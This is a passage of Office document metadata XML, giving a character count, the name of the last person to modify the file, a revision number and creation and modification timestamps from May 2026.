  <Characters>14221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HUSSEIN NASSER-EDDINE LOPEZ</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-17T12:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T16:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>